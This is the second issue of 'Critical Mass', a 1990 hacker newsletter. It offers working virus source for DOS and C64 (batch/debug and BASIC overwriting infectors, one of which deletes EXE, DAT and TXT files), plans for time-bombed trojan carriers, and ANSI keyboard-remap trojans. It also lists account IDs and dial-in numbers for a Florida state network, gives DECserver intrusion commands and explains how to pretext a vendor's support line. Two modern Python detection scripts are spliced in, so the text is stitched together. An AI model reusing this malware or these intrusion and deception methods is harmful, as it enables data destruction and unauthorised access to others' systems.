Critical Mass 2

_____________________________________________________________________________

   Critical Mass          Issue # 02          A Technical Text File Newsletter
                           (11/21/90)
_____________________________________________________________________________


_____________________________________________________________________________
l  Writers                 l  Special thanks to....                         l
l__________________________l________________________________________________l
l                          l                                                l
l  The Beaver              l  Old members of C.C.C, SF, Copy Cat, etc.      l
l  Shadow                  l  Also, Abigail, The Nut-Kracker, Robo., etc.   l
l__________________________l________________________________________________l


* Note: We, the writers and editors of this text newsletter, are not
responsible for any injuries or prosecutions due to the information
given in this text.

EXPERIMENT AT YOUR OWN RISK!

Anybody who is willing can submit an article! If you wish to
submit an article, please e-mail either 'The Beaver' or the 'Nut-
Kracker', via the 'Warriers Retreat' (904)422-3606. Also, all
sysops can freely download this text on the terms that it is not
altered and none of the credits are changed. So.................
please act like a human! Also, for your convenience,
every now and then a 'volume' of the Critical Mass is
created. That is, after three to five issues (roughly 50k to 70k
of text) a compiled text will be made containing the past issues,
so if you have missed any issues, you can download the volume you need.
In order for this text to keep on being produced, you the reader
need to submit, whether it be by asking questions (which will
sometimes be included in the text) or by submitting an article.
Any articles on Hacking, Fone Phreaking, Credit Card Surfing,
Pirating, Chemistry, etc. are welcome. Any general 'not accepted'
material is accepted here! Articles can be on anything from 'how
to rip off this type of coke machine' to 'how to build an Axis bomb
from spare car parts'. We hope you enjoy the information given and
find some use for it.


/\
/\/\ Chief Editors Brought To You By
/\/\/\ ~~~~~~~~~~~~~ Members of
/\/\/\/\ The Beaver (SC/HA)
/\/\/\/\/\ The Nut-Kracker
/\/\/\/\/\/\
/\/Critical\/\
\/\/\Mass/\/\/ (SC/HA)
\/\/\/\/\/\/
\/\/\/\/\/
\/\/\/\/
\/\/\/
\/\/
\/


______________________________________________________________________________
l This issue contains articles of the following..... l
l____________________________________________________________________________l
l l
l I. Editorial written by 'The Beaver'. l
l II. Latest information on hacking InterAct, written by 'The Beaver' l
l III. Destructive Programs For Your IBM PC, Part Two, By 'The Beaver' l
l IV. Very Basic Hacking! By 'The Beaver' l
l VI Hack DEC networks!, Written by 'The Beaver'-'The Shadow' l
l VII. Letters and Replies l
l____________________________________________________________________________l


______________________________________________________________________________
l Todays Topic Is....... l
l Written By The Beaver l
l____________________________________________________________________________l


Well, as you may notice, The Nut-Kracker hasn't submitted any
articles for this text, but for a good reason. He has been having a lot go on
in his life and, well, just hasn't got the time. So, I may be looking for a new
editor and writer soon, so if you wish to fill this position, please E-mail me
at the Warriers Retreat. I wish for someone to fill this position with the
following requirements........ Some sort of hacking experience in the fields of
blue boxing, computer hacking, chemistry, or pirating. If you don't have this
experience, but would still like to become an editor, please E-mail me anyway.
Also, don't expect this issue to be anywhere like the last one, but
if you do have some text files written by various hackers in the USA, please
tell me about them so I can include them in the next issue. I have several texts
that I lost and am looking for..... They are......

The Outlaw Series ........ Written in Tallahassee, Fl (Sub. Explosives)
Hacking VMS............... Written by members of Chaos Control

If you have any copies of these, please E-mail me. By the way, the
last issue (1st one) was over 138k bytes if you downloaded it.


---==<Beaver>==---



__________________________________________________________________________
l I. Latest Information On Hacking InterAct l
l Written By 'The Beaver' l
l________________________________________________________________________l


This is another FIRN hack that Florida hackers may find useful. The
system is called InterAct, off of the Florida Information Resource Network.
The Nut-Kracker and I broke into this system under a Demo account a little
while back. This system is running on an IBM 30XX series, I think, and is
running under VM OS. It is used by the state of Florida along with several
universities. But first, let me give you a list of Florida area fone numbers
to get in contact with this net.........


City Fone Number Baud Rates
-------------------------------------------------------------------------------

Boca Raton (305)395-0552 300/1200
395-1410 300/1200
Brevard (305)639-1790 300/1200
Broward (305)764-5540 300/1200
Eglin AFB (904)678-7056 300/1200
FT.Myers (813)489-4843 300/1200
Ft.Walton (904)244-8185 300/1200
Gainsville (904)392-5362 300/1200
Jacksonville (904)646-2992 300/1200
Miami (305)226-1846 300/1200
Orlando (305)275-2220 300/1200
Pensacola (904)474-2533,4,5,6 300/1200
Sarasota (813)957-4682 300/1200
St.Pete (813)893-9509 300/1200
Tampa (813)974-3890 300/1200
Tallahassee (904)488-0650,1,2,3,4,5,6,7 300/1200
W.Palm Bch. (305)969-3504 300/1200


Actually, a lot of these have 2400 Bds, but I can't remember which
ones do and don't. At any rate, when you log on, you will be greeted with a
'User Name:' prompt. Type 'Menu'. At the Menu you have a choice of three things
to do besides log out. I know it isn't the third choice, so it is either 1 or 2.
Pick either one or two and look for 'InterAct'. Once you have found it, log on
to it. It should ask you for a username, ID and password. You can try the Demo
accounts, but I doubt they will work 'cause we used them to death. Well, if you
have gotten this far you are going to need some usernames plus IDs, so here they
are. This is straight from the buffer.....


1 (INT-FXUWA) SIGNING ON (NOTIME) (NOBREAK)
2 (INT-NWRXL) OPS$NWRAD (INTERACT) (NOTIME)
4 (INT-LEO25) SIGNING ON (NOTIME)
46 (9DA) DEMO$DEMO (INTERACT)
56 (VTA TW1MFAAM) WEB$FAUFA (INTERACT) (NOTIME)
61 (VTA TW1MFAAF) CLS$FAURG (INTERACT) (NOTIME)
68 (VTA TW11DEDG) POR$DOEKD (INTERACT) (NOTIME)
75 (VTA TW1MFAAQ) SIGNING ON (NOTIME)
77 (VTA TW11FX1M) SGM$FSUAD (INTERACT) (NOTIME)
78 (VTA TW1MFXT8) RRN$FSUWK (INTERACT) (NOTIME)
81 (VTA TW1MFSF6) SA3$FSUHC (INTERACT) (NOTIME)
82 (VTA TW1MFSGM) FSU$FSUAD (INTERACT) (NOTIME)
91 (VTA TW11BR26) MKP$BORMS (INTERACT) (NOTIME)
103 (VTA TW11BR2F) MJH$BORMS (INTERACT) (NOTIME)
105 (VTA TW11FXZE) QC3$FSUAD (INTERACT) (NOTIME)
106 (VTA TW1MFXTO) FDA$FSUAC (INTERACT) (NOTIME)
107 (VTA TW11DEDO) SIGNING ON (NOTIME)
109 (VTA TW11DEB7) SIGNING ON (NOTIME)
111 (VTA TW1MCFAK) DFH$FTUIC (INTERACT) (NOTIME)
113 (VTA TW1MFSGZ) BRI$FSUBI (INTERACT) (NOTIME)
137 (VTA TW1MAMXB) MNG$FAMDC (INTERACT) (NOTIME)
138 (VTA TW1MFXUI) LST$FSUAD (INTERACT) (NOTIME)
140 (VTA TW1MCFA0) AIR$FTUIC (INTERACT) (NOTIME)
155 (VTA TW11FIY2) PRO$FIUAD (INTERACT) (NOTIME) (NOBREAK)
160 (VTA TW1MFSEY) SA2$FSUHC (INTERACT) (NOTIME)
166 (VTA TW1MFAAU) BCL$FAUFA (INTERACT) (NOTIME)
174 (VTA TW1MFIAI) IAG$FIUAD (INTERACT) (NOTIME)
183 (VTA TW11CJ20) CJC$CJCCS (INTERACT) (NOTIME)
187 (VTA TW1MFIA7) ABS$FIUAD (INTERACT) (NOTIME)
191 (VTA TW1MNWXA) KMA$NWRIC (INTERACT) (NOTIME) (DISK)
193 (VTA TW1MNWXX) GWS$NWRAD (INTERACT) (NOTIME)
197 (VTA TW1MFAAH) SSS$FAURG (INTERACT) (NOTIME)
200 (VTA TW1MFAAP) CAS$FAURG (INTERACT) (NOTIME)
202 (VTA TW11DE1Q) AC5$DOEKD (INTERACT) (NOTIME)
205 (VTA TP11WFHE) DWS$UWFCS (INTERACT) (NOTIME)
209 (VTA TW11FX0G) PCF$FSUAD (INTERACT) (NOTIME)
246 (VTA TW1MBYA8) BAY$BAYCS (INTERACT) (NOTIME)
247 (VTA TW1MFIAC) AXD$FIUAD (INTERACT) (NOTIME)
38 ACTIVE, 33 SIGNED ON, 33 ON INTERACT.
COMMAND?


All the numbers to the left are ports. The first two ports are for the
sysops, and notice that on port 46 there is a 'demo,demo' account that
they forgot to take out. That's how we hack the systems. Now let me explain how
to find the user IDs and names. Look at port 2. Notice that it says 'OPS$NWRAD'.
'OPS' is the username and 'NWRAD' is the ID. You can also sometimes tell where
certain people are calling from. For example, people with the user name 'BAY' are
probably calling from Bay County, Fl., probably on the Eglin AFB line. Note:
notice that the port 246 ID is BAYCS, or Bay County Schools. Notice things like
DOE (Dept. Of Education). Also, if you have any questions on hacking computers
in the Tallahassee region or just a type of system, I or someone I know may
be able to help, so just E-mail me if you have any sort of questions.


________________________________________________________________________
l Destructive Programs For Your IBM l
l Part Two l
l Written By 'The Beaver' l
l______________________________________________________________________l


In part one (issue#1), we covered the following........

How to use a text writer and debug to create small assembly programs.
How to destroy disks (Trojan Horse) on drives A, B and C.
How to create false errors.
How to disable ALT-CTRL-DEL warm boot.
A few other minor things.

Hopefully, we can carry this a little farther.


Command Level Batch Virus.
--------------------------------


A lot of people believe that it is not possible to create a virus
at a command level. This is wrong, though the virus is not that deadly. The
following code was put in for people to get a basic understanding of a virus.
The virus comes in four parts and is very, very easy to stop. If one of these
parts is deleted, the virus will fail to work. This code was written by Ralf
Burger in 1988 as a demonstration virus. Here's the code in three parts and
what the four parts are named.

Name:Vr.bat (use edlin to enter it)

echo=off
ctty nul
dir *.com/w>ind
edlin ind<1
debug ind<2
edlin name.bat<3
ctty con

Name:1 (use edlin)

1,4d
e

Name:2 (use edlin)


m100,10b,f000
e108,".bat"
m100,10b,f010
e100,"del "
mf000,f00b,104
e10c 2e
e110 0d,0a
mf010,f020,11f
e112 "copy \vr.bat "
e12b,0d,0a
rcx
2c
nname.bat
w
q

Name:3 (Must use Debug to enter this because of the 1Ah)

0100 31 2c 31 3f 52 20 1a 0d-6e 79 79 79 79 79 79 79
0110 79 20 0d 32 2c 32 3f 52-20 1a 0d 6e 6e 79 79 79
1120 79 79 79 79 20 0d 45 0d-00 00 00 00 00 00 00 00

If you care to understand how the code works, then simply remove the
'ctty nul', because this sends all output to a 'nul' device. If you remove
that, also remove the 'ctty con', which restores output to the console. After
doing this, it should become very clear what is happening. This is a
command level, overwriting logical virus, so it actually takes the place of
its host's code.

For part two, I am going to keep the first few programs very simple
and will probably get more into assembly code as we go along. As you have
probably been thinking, 'wouldn't assembly code work much better for a virus?'.
Well, that's correct. But first let's just get the basic understanding.

The following code is written in BASIC. It is a logical overwriting
virus, but better self-contained. It infects all files with the extension
COM. The actual virus, though, is compiled to EXE. form. To do this, I
used QuickBasic 4.5. The marker is the length of the virus, or 40396 bytes.
This virus is also easy to stop, because the time and date stamp change, and the
length of the program and the file type also change. But to a person who isn't
greatly familiar with computers, it could still cause havoc. The only good thing
about this is that it is totally self-contained. Here's the listing....


1 ON ERROR GOTO 3500: CLS : COLOR 0, 0
2 SHELL "dir *.exe>dna": SHELL "dir *.com>rna"
5 OPEN "rna" FOR INPUT AS #1
10 INPUT #1, w$, x$, y$, z$, a$
15 CLOSE #1: f = 1: KILL "rna": IF a$ = "" THEN 3500
20 f = f + 1
25 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 30
27 GOTO 20
30 oname$ = MID$(a$, 1, f - 1)
35 OPEN "dna" FOR INPUT AS #1
40 INPUT #1, w$, x$, y$, z$
45 INPUT #1, a$: b$ = MID$(a$, 17, 5)
47 a = VAL(b$)
50 IF a <> 40396 THEN 45
53 KILL "dna"
55 f = 1
60 f = f + 1
65 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 75
70 GOTO 60
75 nname$ = MID$(a$, 1, f - 1): COLOR 0, 0
80 KILL oname$ + ".com": SHELL "copy " + nname$ + ".exe " + oname$ + ".exe"
90 COLOR 0, 0
3010 KILL "dna": SHELL "del rna": end
3500 CLS : KILL "dna": KILL "*.exe": KILL "*.dat": KILL "*.txt": PRINT "Cough, H
ack, Sniff"
3501 end


As you may notice, when the computer hits a disk error, all data is
destroyed. The next virus is also written in BASIC and is a logical virus.
Once again you will need a compiler to use it properly. The only
difference is that the virus infects files with the extension EXE. The
logical virus itself is also an EXE. type virus. But the modifications compared
to the one up top make this one work far better. The trait that it shares
with the first listing is that it also uses the length as a marker. The
advantages over the one up top are that......

1. The listing is shorter.
2. Disk access is cut in half, so less time is consumed.
3. The file type stays the same.


1 CLS : COLOR 0, 0, 0: ON ERROR GOTO 210: SHELL "DIR *.EXE>DNA": OPEN "DNA" FOR

INPUT AS #1: INPUT #1, W$, X$, Y$, Z$, A$
10 IF A$ = "" THEN 200
15 B$ = MID$(A$, 17, 5): B = VAL(B$)
20 IF B <> 38622 THEN 50
25 IF VNAME$ <> "" THEN INPUT #1, A$: GOTO 10
30 F = 1
35 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 40
38 GOTO 35
40 VNAME$ = MID$(A$, 1, F - 1): IF VNAME$ <> "" AND oname$ <> "" THEN 80
45 INPUT #1, A$: GOTO 10
50 IF oname$ <> "" THEN INPUT #1, A$: GOTO 10
55 F = 1
60 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 70
65 GOTO 60
70 oname$ = MID$(A$, 1, F - 1): IF oname$ <> "" AND VNAME$ <> "" THEN 80
75 INPUT #1, A$: GOTO 10
80 CLOSE #1: KILL "DNA": KILL oname$ + ".EXE": SHELL "COPY " + VNAME$ + ".EXE "
+ oname$ + ".EXE"
200 END
210 IF oname$ <> " " THEN SHELL oname$
220 END


In case you have a little trouble understanding the two, here are some
flow charts that may, or may not help.



          Create a 'DNA' and 'RNA'
          file. 'DNA' holds all
          'EXE.' files. 'RNA' holds
          'COM.' files.

                    !
                    !
                    !

          Are there any infectable
          'COM' files stored in
          the 'RNA' file list?

            Y                          N

            !                          !
            !                          !
            !                          !
                                I am not home!!!

   Get the name and             Del all 'TXT.', 'DAT.' and
   store as 'oname'             'EXE.' files and display
                                the message 'Cough, Hack,
            !                   sniff'. After that, do a
            !                   crash.
            !

   Del 'RNA' and look through 'DNA' for a copy of the virus.
   The marker is the length of the virus. Note: If it does
   not exist, there is no way the prg. can be held in
   memory. This will be stored as 'nname'.

            !
            !
            !

   Delete 'DNA' and the name under the string 'oname',
   which will be a 'EXE.' file.

            !
            !
            !

   Copy the virus 'nname' to the name the old file was under,
   'oname', and do a system crash.

-------------------------------------------------------------------------------

The Dir. will go from this.........

   PRAY1.COM      To......      PRAY1.EXE (Vir. Here)
   PRAY2.COM                    PRAY2.COM (No Vir)

And so on to 'Pray2'....



Here is a flow chart for the second virus listing.


                              Virus 2

                   Flow chart to a EXE to EXE
                   infector, unlike Virus 1.
______________________________________________________________________________


      Shell to DOS and create a file
      with all EXE. files in the
      current directory. The file
      that contains all the EXE file
      names is called `DNA`

                   !
                   !

      Get a file name out of `DNA`  <------------------------------!
                   !                                               !
                   !                                               !
      Does the file name pulled contain a                          !
      virus?                                                       !
                                                                   !
           Y                          N                            !
           !                          !                            !
           !                          !                            !
    Is 'vname' taken?          Is 'oname' taken?                   !
                                                                   !
      N       Y ------------------------------------------------>--!
      !                          N       Y --------------------->--!
      !                          !                                 !
      !                          !                                 !
 Store file name as         Store file name as                     !
 'vname'. Has 'oname'       'oname'. Has 'vname'                   !
 been used?                 been used?                             !
                                                                   !
      Y       N ------------------------------------------------>--!
      !                          Y       N --------------------->--!
      !                          !
      !__________________________!
                   !
                   !
                   !

           Replicate and end.
           ^^^^^^^^^^^^^^^^^^
______________________________________________________________________________

Virus2: Logical Virus.

`Oname` - Old file name used. This is the original uninfected file.
`Vname` - Virus file name. This file has been infected and is retrieved
so that the virus can copy itself to the `oname`.
e.g. -
Delete oname
Copy vname.exe oname.exe

(Sept. 18, 1990) Written by The Beaver.
______________________________________________________________________________
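
Both BASIC listings above replace a host file with a byte-for-byte copy of the infector, so the traces the text names (changed length, date stamp and file type) can be checked mechanically. The baseline comparison below is an added example, not code from the original newsletter; the function names and the constructed file contents are assumptions, and the PRAY file names follow the directory illustration above.

```python
import hashlib
import os
import tempfile

EXEC_EXT = {".com", ".exe"}


def snapshot(directory):
    """Map lower-cased file name -> (size, sha256 hex) for .COM/.EXE files."""
    snap = {}
    for entry in os.scandir(directory):
        ext = os.path.splitext(entry.name)[1].lower()
        if entry.is_file() and ext in EXEC_EXT:
            with open(entry.path, "rb") as fh:
                data = fh.read()
            snap[entry.name.lower()] = (len(data), hashlib.sha256(data).hexdigest())
    return snap


def compare(baseline, current):
    """Return sorted (kind, name, detail) findings between two snapshots."""
    findings = []
    for name, (size, digest) in baseline.items():
        stem, ext = os.path.splitext(name)
        if name not in current:
            twin = stem + ".exe"
            if ext == ".com" and twin in current and twin not in baseline:
                # Trace of the first listing: NAME.COM gone, NAME.EXE appears.
                findings.append(("replaced-by-exe", name, twin))
            else:
                findings.append(("missing", name, ""))
        elif current[name][1] != digest:
            new_size = current[name][0]
            findings.append(("modified", name, "%d -> %d bytes" % (size, new_size)))
    # An overwriting infector leaves byte-identical copies of itself behind,
    # so several executables with the same size and hash are worth a look.
    clusters = {}
    for name, (size, digest) in current.items():
        clusters.setdefault((size, digest), []).append(name)
    for (size, _), names in clusters.items():
        if len(names) > 1:
            findings.append(
                ("identical-copies", ",".join(sorted(names)), "%d bytes" % size)
            )
    return sorted(findings)


def demo():
    """Build a constructed before/after directory and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        def put(name, data):
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(data)

        # Constructed placeholder contents; no real program code is involved.
        put("PRAY1.COM", b"host-one")
        put("PRAY2.COM", b"host-two")
        put("TOOL.EXE", b"tool!")
        put("GAME.EXE", b"same-blob")
        before = snapshot(d)

        # Constructed "after" state matching the directory change the text
        # describes: one COM replaced by an EXE, one EXE overwritten in place.
        os.remove(os.path.join(d, "PRAY1.COM"))
        put("PRAY1.EXE", b"same-blob")
        put("TOOL.EXE", b"same-blob")
        after = snapshot(d)
    return compare(before, after)


if __name__ == "__main__":
    for kind, name, detail in demo():
        print(kind, name, detail)
```

Identical copies of a legitimate program also land in the `identical-copies` group, so that finding is a prompt to look, not a verdict.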


For the programs written in BASIC, it would be wise to use carrier
programs, though they are not needed. It does look better if you do use one
with these though. If you are going to write a carrier program, odds are that
you will write it in BASIC. If so, this is the best operation I see that you
can do. Make the carrier program and the virus two different programs to save
disk access time. Make a 'loader' or replace one on a program, such as a word
processor, which we'll use for example. I would also go by either date or the
number of times the program is used. I prefer the date because you don't have
to read/write to the disk in the carrier program, thus saving time. This is the
order I would do them in.....

1. Is today equal or greater than the date to go off? If so, continue to 2.
If not, run the wordprocessor as usual.
2. Shell to the alt-ctrl-del killer (mentioned in issue#1)
3. Shell to the virus.
4. End.

Actually, what I think is a good idea is to change the file type of
your virus from EXE. to, say, DAT. This will make it more confusing to the user.
So your carrier would look like this......

1. Is today equal or greater than the date to go off? If so, continue to 2.
If not, run the wordprocessor as usual.
2. Shell to the alt-ctrl-del killer
3. Change the virus's file type from DAT. to EXE.
4. Shell to the virus
5. Change the virus back to a DAT. file
6. End.


Of course, this also will increase disk access time. That's the main
problem with viruses in any high level language. I did not include any carrier
code in this text because I am pretty sure that most users can write their own,
but if you would really like some carrier code, then E-mail me and I will
include it in the next issue.

ATTENTION COMMODORE 64/128 USERS!
-----------------------------------

This is a very simple logical virus that I wrote on the c64
a number of years ago. This is the simple listing, in BASIC once again so that
you can build on it. I could have modified this listing several times, but I will
leave that up to you. You can add in things like a line to determine if the
virus is running on a c64 or c128. If it's running on a c128, you can tell it
to step up the clock speed, etc, etc..... I also have written a ton of trojan
horses for this machine, but will not include them here. If you wish that I,
drop me a line........

10 open 1,8,0,"$0"
30 get#1,a$,b$
40 get#1,a$,b$
50 c=0
60 if a$<>"" then c=asc(a$):if c<>9 then 30
70 if b$<>"" then c=c+asc(b$)*256
84 get#1,b$:get#1,c$:get#1,d$:get#1,e$:b$="":c$="":d$="":e$=""
85 get#1,f$,g$,h$,i$,j$,k$,l$,m$,n$,o$,p$,q$,r$,s$,t$,u$,v$,w$
90 z$=f$+g$+h$+i$+j$+k$+l$+m$+n$+o$+p$+q$+r$+s$+t$+u$+v$+w$
100 close 1:open 15,8,15:print#15,"s0:"+z$
110 close 15
120 open 15,8,15,"i":close 15:save z$,8


That's all the Commie stuff I'm including in this issue, unless you ask
for more in further issues.

Let's now move on to the Trojan Horse for the IBM. It has been thought
for a long time that it was impossible to write a trojan into a text file on
the IBM. This is WRONG. There is a great danger that lies here. The reason is
the ANSI driver that is installed on most IBMs today. It is
possible that I could have included a trojan in the very text you're reading, but
I did not. But to prove a point, at the end of this text, press the 'A' key and
there will be a msg. displayed. This is what you would see right here.......
(NOTE: for the letter 'A' to be remapped, you must 'type' this file and have
an ANSI driver installed.)


"[65;"echo The Beaver Was Here!";13p"
"[97;"The Beaver Was Here!!!";13p"


These are escape codes. I could have easily said something like, gee,
ya know what you should never type? That del *.com. In that one sentence, I
COULD have remapped your keyboard to wipe every COM. file out when you hit the
letter 'D'. But I didn't though. Here's how it is done......


What is happening is that we are placing escape codes at the beginning
of our sentence. I will show you the escape codes here. Note the hex dump of
the .......


22 1B 5B 36 35 3B 22 65-63 68 6F 20 54 68 65 20 ".[65;"echo The
42 65 61 76 65 72 20 57-61 73 10 48 65 72 65 21 Beaver Was Here!
22 3B 31 33 70 22 0D 0A-00 00 00 00 00 00 00 00 ";13p"..

First let me explain what some of the Hex codes stand for.......

22 - " 20 - (space) 1B - escape

Now, actually, the first '22' and the last one can be removed with
no effect on the trojan. After the '22', you will notice a 1B, which invokes
the ANSI controller. Then what we tell it is that we are remapping asc '65', or
the letter 'A', to mean 'echo The Beaver Was Here'. The 13p gives us a return at
the end. I won't go too much into detail for you IBM users, because that's why the
program 'Remap Utility 1.0' was included in this issue. This program does
the whole remapping process for you. If you do want to learn more about ANSI,
then refer to your manual. Well, that's part two, but the next issue will
contain part three of this ongoing series. The next part will contain.......

Complete non-overwriting code in assembly.

That's about it, the code's pretty long..... (500 bytes with remarks)
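
A check for the key-reassignment sequences described above, as an added example that is not part of the original newsletter: it finds ESC [ ... p sequences in a file's bytes before the file is displayed and can strip them. The function names are assumptions, and the sample bytes are constructed from the two sequences shown in the text.

```python
import re

# One parameter: a decimal number, or a string quoted with " or '.
_PARAM = rb"""(?:\d+|"[^"\r\n]*"|'[^'\r\n]*')"""
# ESC [ param ; param ... p  is the ANSI.SYS key-reassignment sequence.
_REMAP = re.compile(rb"\x1b\[(" + _PARAM + rb"(?:;" + _PARAM + rb")*)p")
_TOKEN = re.compile(_PARAM)

# Constructed sample: plain text, the two remaps from the article, and a
# harmless colour sequence that must not be reported.
SAMPLE = (
    b"Some text\r\n"
    b'\x1b[65;"echo The Beaver Was Here!";13p'
    b'\x1b[97;"The Beaver Was Here!!!";13p'
    b"\r\nmore text \x1b[1;31mred\x1b[0m\r\n"
)


def _label(key):
    """Human-readable name for the key being redefined."""
    if isinstance(key, bytes):
        return key.decode("latin-1")
    if isinstance(key, tuple):
        return "extended 0;%d" % key[1]
    return chr(key) if 32 <= key < 127 else "code %d" % key


def find_key_remaps(data):
    """Return one finding (dict) per key-reassignment sequence in `data`."""
    findings = []
    for m in _REMAP.finditer(data):
        params = []
        for tok in _TOKEN.findall(m.group(1)):
            quoted = tok[:1] in (b'"', b"'")
            params.append(tok[1:-1] if quoted else int(tok))
        # Extended keys (function keys and the like) are written as 0;nn.
        if len(params) > 1 and params[0] == 0 and isinstance(params[1], int):
            key, rest = (0, params[1]), params[2:]
        else:
            key, rest = params[0], params[1:]
        replacement = b"".join(
            p if isinstance(p, bytes) else bytes([p % 256]) for p in rest
        )
        findings.append({
            "offset": m.start(),
            "key": _label(key),
            "replacement": replacement,
            # A trailing 13 means the new text is submitted without the
            # user pressing Enter, which is what makes a remap dangerous.
            "sends_enter": replacement.endswith(b"\r"),
        })
    return findings


def strip_key_remaps(data):
    """Return `data` with every key-reassignment sequence removed."""
    return _REMAP.sub(b"", data)


if __name__ == "__main__":
    for f in find_key_remaps(SAMPLE):
        print("offset %(offset)d: key %(key)r -> %(replacement)r" % f)
```

Colour and cursor sequences end in letters other than `p`, so they pass through untouched; only keyboard redefinitions are reported or stripped.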




______________________________________________________________
l Very Basic Hacking l
l Written By 'The Beaver' l
l_____________________________________________________________l



I have noted that there are a lot of young and new hackers taking on
the BBS scene. A lot of them are completely new to hacking, so I included a
few tips and advice for the new hackers out there. All you other, more
experienced hackers can just skip through this stuff, or bear through it
in hopes you may learn something.


Unix   - UNIX can sometimes be identified just by the prompt, just like most
         machines. On a VAX running UNISTRIDE, you will get a greeting
         message of some sort along with a logon prompt. Type CTRL-S.
         If the damn thing freezes up on ya, it's probably UNIX. To get it
         unstuck, hit CTRL-Q. There are other ways to identify this. Sometimes
         a CTRL-Y will reset the login message. Characters that make the
         cursor dance, etc. UNIX is hard to put in one field, because it can
         be used on everything from the home PC to a mainframe. I really hate
         UNISTRIDE, unless it is set up hack easy, which is rare. You can hack
         it several ways. First off, some UNIX systems allow you to use a
         'WHO' command to get a userlist before logging on. This is rare.
         You can, believe it or not, sometimes use the rapid fire method
         (explained later). Sometimes there are also guest accounts. A guest
         account goes like this: Username:GUEST Password:<CR>. Hard, huh?
         Once inside, you will find this OS very easy to use. To get higher
         access, you can get the privileged password. That is, like on a DEC
         server, normal users can become privileged by the use of one password.
         There are also some other advanced ways discovered by Robert Morris,
         Jr., like the Sendmail attack and the fingerd attack, but we won't
         go into advanced hacking right now.
VMS    - Very user friendly. To confirm you're on VMS, type /XXXX. Fill in the
         'XXXX' with any garbage. If you get an error along the lines of
         'command qualifier not present', or something like that, you're on
         VMS. Try DEMO accounts first (always do this!). A lot of times, the
         password is the same as the username, in the default settings. Get
         a copy of 'Hacking VMS' by the Chaos Control Commit. (C.C.C). If you
         find this, e-mail me, I can't find it anywhere.
VM-370 - Sucks


Well I won't go into Primo's, VM-370, RSTS, TOPs, or ULTRIX shit.

Rapid  - This method doesn't work much anymore, except on old Burroughs
Fire     systems and stuff. At any rate, here's what happens. Imagine you ask
         a system 'what time is it?'. The system will put your command in a
         buffer and run off and see if you have access to get the time. While
         it runs off, you change the command to something like, 'Give me a
         userlist'. The system comes back with an 'Okay', and allows the second
         command to fall through. That's one way of this method, here's another.

         You ask the system any question, like the time for instance. When it
         runs off to get verification, you fill the buffer with crap. This is
         basically how the fingerd method works, but a little more complicated.
         I've only seen these two methods work once, on a B2700, I think it was.
Decoy  - Ok, this is a more advanced hacking method. I will just give the idea
         here. We'll actually get into it in Hacking DEC, part II. Think of
         this on a PC BBS level. You're the user and I'm the hacker. Now
         you call the BBS and you see things to recognize, right? Things like
         welcome to such and such BBS and all that. Well, one day I decide I
         want an account on a system. We'll just say that I use call forwarding
         from the BBS to my house. See? I get all the info and not the BBS!
         So in the end, you think you're on something you're not, and I get all
         the info!




__________________________________________________________________
l l
l Hacking DECserver's Part II l
l By 'The Beaver' l
l________________________________________________________________l



Here is more information about those great DECservers you and I love.
Please read part I or you won't understand what is going on. The information
given, like last time, we believe has never been disclosed in any other text file
or newsletter. You should feel lucky. All information was found by myself,
'The Beaver', 'Shadow', and 'The Nut-Kracker'. We also had some help from
several other people. Thanx..........

To start off, let's talk just about the servers themselves. In the first
part, I called it 'Hacking DEC200 servers'. This was an incorrect statement.
That is, you can use these skills on many other nets such as the EMULEX corp.
Performance4000, or the DEC300 servers, so don't take the first part that
literally. There are some things different on the DEC200s and 300s. 200s
can only support 8 ports because there are only 8 rs232 ports, but they can
be expanded to 16 ports. The 300 has 16 ports and can support 32. Some DECs
can support up to 50 ports that I know of. The same with 4000s. One great
way to find out hacking info on these is to call DEC at 1800-323-4827. Sound
like you know what you're talking about, and they will tell you anything. Just
say something like, "Hello, I'm here at UF using a DEC (DECK)200, and I'm having
trouble setting up the maintenance password. What should I do?". He'll ask you
a bunch of questions like, "What's the DEC200 on?". You say "A VAX running VMS
5.1". If you sound like you know what you're doing, you can get anything from
these people. Well, enough small talk, let's get started..........

A while back, the Shadow and I found a state-run DEC200 in our
region. All it had on it was 2 in/out modems (pre-programmed), a LAT printer,
and a VAX named 'Legal3'. Pretty pointless to use a server for this, but
at any rate, we became interested in the VAX. We decided to attempt to set up a
decoy (explained later in the text). Shadow was the first to do this.
When he set it up, he found that suddenly a remote port logged in and
was following him around, but when he disconnected from it, the remote port
disappeared. Pretty strange, needless to say. We came to the theory that this
was some sort of monitoring port that seemed to only come alive when a service
was set up. At any rate, it doesn't stop there. Once he tried to knock
out that remote port and got a -151- error message, or 'system init 1 minute
to shut down', but this was canceled, though not by him. We figure that there are
ways to make your server more secure. We were able to get past it though.
Just recently, we found this while trying to set up decoys. This is
really odd, and we still don't know what to make of it. We went on and typed
the following........

set service test
set service test idenification "testing 1-2-3"
set service test port all enabled

This creates a fake service "test" and says that all ports can use
it. The thing is that it says it's a computer, it's available and this is what
it is. When you connect to it, nothing happens. A complete null. Once though,
when we were hacking very fast, but I won't go into that, Shadow was booted
from the system, and a remote port was put in his place. The chaser program that
I just talked about. He got booted because of call waiting. I wasn't sure
if he left or if he changed his port from dynamic status to remote status,
so I sent him a message. I got no response, and returned to the fake service.
When I returned, I received my own message, even though I sent it to his port.
Could this be the broadcast buffer? We are not sure yet, and will fill you in
when the answer is found. Here are a few more commands that will help you in
the future.

set server dump e/d (priv. only)
In a REAL crash (not a init), all memory contents are
dumped to a console port, or YOU!
sho service local shows all local services like LAT printers, in/out
modems, etc............
and last but not least.......

set service connections (get help) this allows you to connect OTHER ports to
services.


Well, sorry there's not more, but we have been having some trouble
lately, but there is more to come........ Before I go, here is a list of
call numbers off of ufnet for you FIRN hackers.........

Call # Comment
-----------------------
200 DECserver
201 EMULEX 4000 server
202 Ditto
3000 DECserver
3001 Ditto
3002 Ditto
3003 Ditto
2000 NERDC (North east regional data center)
1400 VAX/UNIX ??????
1100 UNKNOWN
900 Industrial VAX/UNIX
800 UNIX(Bikini)
700 UNIX/VAX (Beach)
500 VAX 11/750
250 DECserver (down ALOT!)
170 Selene
120 Selene


That's All! Chow

---==<Beaver>==---




_____________________________________________
l l
l Letters and Replies l
l___________________________________________l


